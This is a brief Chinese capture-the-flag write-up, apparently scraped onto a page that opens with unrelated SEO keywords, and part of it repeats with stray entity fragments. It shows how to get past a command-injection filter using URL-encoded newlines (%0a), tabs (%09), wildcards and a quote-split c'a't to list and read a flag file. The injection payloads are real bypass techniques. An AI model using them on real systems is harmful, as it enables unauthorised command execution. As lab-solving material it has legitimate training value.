5G网站建设,设计吧官网,软文新闻发布平台,自媒体135官网手机版下载开启题目 查看网页源代码发现这次网页对 | 、 、 || 、 \ 、 / 、; #xff0c;都进行了过滤处理 发现换行符 %0a 和回车符 %0d 可以进行测试#xff0c;在 URL 后面拼接访问
127.0.0.1%0als 用 ls flag_is_here 查看 flag 文件中的内容#xff0c;发现回显为空…开启题目 查看网页源代码发现这次网页对 | 、 、 || 、 \ 、 / 、; 都进行了过滤处理 发现换行符 %0a 和回车符 %0d 可以进行测试在 URL 后面拼接访问
127.0.0.1%0als 用 ls flag_is_here 查看 flag 文件中的内容发现回显为空发现网页源代码中还过滤了几个字符分别是 cat 、 flag 、 ctfhub 这里尝试使用 %09 URL 编码中 表示 Tab 制表符加上通配符进行绕过
127.0.0.1%0als%09*here 127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
